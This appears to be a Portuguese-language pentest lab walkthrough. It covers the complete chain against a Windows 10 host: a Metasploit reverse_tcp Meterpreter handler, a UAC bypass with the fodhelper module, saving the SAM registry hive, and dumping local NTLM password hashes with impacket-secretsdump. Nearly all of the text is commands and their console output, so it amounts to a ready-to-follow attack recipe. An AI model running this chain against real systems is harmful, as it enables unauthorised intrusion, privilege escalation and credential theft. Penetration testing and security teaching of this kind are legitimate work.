use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <lhost>
set LPORT <lport>
exploit
Podemos tentar executar o hashdump porém como não temos acesso privilegiado, não será possível.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Vamos tentar realizar uma função administrativa como, por exemplo salvar o SAM direto do registro. (hkml = HKEY-LOCAL-MACHINE)
C:\>reg save hklm\sam arqSam
ERROR: Access is denied.
Dá acesso negado, então é necessário escalar para um privilégio administrativo para que isso seja possível.
Vamos então procurar módulos para dar bypass no UAC (User Account Control). Para isso podemos usar o background sem matar a sessão.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOM 192.168.2.134:666 -> 192.168.2.137:612
S 48 (192.168.2.137)
msf6 exploit(multi/handler) > search uac
msf6 exploit(windows/local/ask) > use exploit/windows/local/bypassuac_fodhelper
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_fodhelper) > show options
Module options (exploit/windows/local/bypassuac_fodhelper):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/bypassuac_fodhelper) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_fodhelper) > show targets
Exploit targets:
Id Name
-- ----
0 Windows x86
1 Windows x64
msf6 exploit(windows/local/bypassuac_fodhelper) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_fodhelper) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_fodhelper) > exploit
Com isso, conseguimos dar bypass no UAC e obter os arquivos.
meterpreter > shell
Process 2424 created.
Channel 1 created.
Microsoft Windows [vers�o 10.0.19043.1083]
(c) Microsoft Corporation. Todos os direitos reservados.
C:\Windows\system32>cd \
cd \
C:\>reg save hklm\sam sam1
reg save hklm\sam sam1
A opera��o foi conclu�da com �xito.
Com os dois arquivos, SAM e system, conseguimos as hashes utilizando o impacket-secretsdump
┌──(user㉿kali)-[~/Desktop]
└─$ impacket-secretsdump -sam sam1 -system system1 LOCAL 130 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xd34a2958235bcb73bb29ba99ea85df58
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:91831139e883c482ff011cf6801468dc:::
trzwo:1001:aad3b435b51404eeaad3b435b51404ee:4469eae41ee734606dc5321bae42c5f3:::
[*] Cleaning up...
O mesmo ocorre se utilizarmos o hashdump do meterpreter também.